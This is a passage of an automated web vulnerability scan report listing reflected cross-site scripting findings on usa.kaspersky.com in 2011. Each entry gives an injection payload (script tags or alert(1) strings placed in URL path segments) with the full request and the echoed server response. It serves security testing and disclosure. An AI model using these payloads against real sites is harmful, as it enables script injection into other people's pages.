<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites7d226"-alert(1)-"5cbfac5401b/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-
...[SNIP]...

1.209. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d2ac"><script>alert(1)</script>6aad20417ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites5d2ac"><script>alert(1)</script>6aad20417ca/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:19:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138792"
Content-Type: text/html; charset=utf-8
Content-Length: 32580
Date: Sun, 04 Sep 2011 12:19:55 GMT
X-Varnish: 1163045716
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites5d2ac"><script>alert(1)</script>6aad20417ca/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.210. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 815b2"><script>alert(1)</script>37f0e3b07ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com815b2"><script>alert(1)</script>37f0e3b07ae/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138822"
Content-Type: text/html; charset=utf-8
Content-Length: 32572
Date: Sun, 04 Sep 2011 12:20:24 GMT
X-Varnish: 1163046521
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com815b2"><script>alert(1)</script>37f0e3b07ae/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.211. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb994"-alert(1)-"9771fba1a77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comcb994"-alert(1)-"9771fba1a77/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138831"
Content-Type: text/html; charset=utf-8
Content-Length: 33782
Date: Sun, 04 Sep 2011 12:20:33 GMT
X-Varnish: 1163046707
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comcb994"-alert(1)-"9771fba1a77/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.212. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fd41"-alert(1)-"4857cb508a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files6fd41"-alert(1)-"4857cb508a7/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138869"
Content-Type: text/html; charset=utf-8
Content-Length: 34710
Date: Sun, 04 Sep 2011 12:21:12 GMT
X-Varnish: 1163047910
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files6fd41"-alert(1)-"4857cb508a7/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.213. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52d43"><script>alert(1)</script>2e4b5f14ad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files52d43"><script>alert(1)</script>2e4b5f14ad6/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138862"
Content-Type: text/html; charset=utf-8
Content-Length: 32634
Date: Sun, 04 Sep 2011 12:21:04 GMT
X-Varnish: 1163047608
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files52d43"><script>alert(1)</script>2e4b5f14ad6/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.214. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb19"><script>alert(1)</script>6efbe913e54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctoolsdcb19"><script>alert(1)</script>6efbe913e54/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138901"
Content-Type: text/html; charset=utf-8
Content-Length: 35243
Date: Sun, 04 Sep 2011 12:21:44 GMT
X-Varnish: 1163048866
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctoolsdcb19"><script>alert(1)</script>6efbe913e54/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.215. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b23a"-alert(1)-"622df54d13d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools4b23a"-alert(1)-"622df54d13d/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138911"
Content-Type: text/html; charset=utf-8
Content-Length: 37319
Date: Sun, 04 Sep 2011 12:21:54 GMT
X-Varnish: 1163049128
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools4b23a"-alert(1)-"622df54d13d/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.216. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f5d"><script>alert(1)</script>811dc359d64 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/css69f5d"><script>alert(1)</script>811dc359d64/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138948"
Content-Type: text/html; charset=utf-8
Content-Length: 32633
Date: Sun, 04 Sep 2011 12:22:32 GMT
X-Varnish: 1163050310
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css69f5d"><script>alert(1)</script>811dc359d64/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.217. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 769eb"-alert(1)-"a9e76941f9f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools/css769eb"-alert(1)-"a9e76941f9f/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138963"
Content-Type: text/html; charset=utf-8
Content-Length: 34037
Date: Sun, 04 Sep 2011 12:22:50 GMT
X-Varnish: 1163050769
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css769eb"-alert(1)-"a9e76941f9f/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.218. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e17"><script>alert(1)</script>267d3d6753e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc4e17"><script>alert(1)</script>267d3d6753e?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139026"
Content-Type: text/html; charset=utf-8
Content-Length: 32634
Date: Sun, 04 Sep 2011 12:23:51 GMT
X-Varnish: 1163052465
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc4e17"><script>alert(1)</script>267d3d6753e?R" />
...[SNIP]...

1.219. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0526"-alert(1)-"1eb0bf43450 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc0526"-alert(1)-"1eb0bf43450?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139045"
Content-Type: text/html; charset=utf-8
Content-Length: 34037
Date: Sun, 04 Sep 2011 12:24:16 GMT
X-Varnish: 1163052951
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc0526"-alert(1)-"1eb0bf43450?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.220. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f7"-alert(1)-"2f806a7d1f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf6a7f7"-alert(1)-"2f806a7d1f2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139040"
Content-Type: text/html; charset=utf-8
Content-Length: 35570
Date: Sun, 04 Sep 2011 12:24:07 GMT
X-Varnish: 1163052827
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf6a7f7"-alert(1)-"2f806a7d1f2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.221. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c50b"><script>alert(1)</script>3e346afd99a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

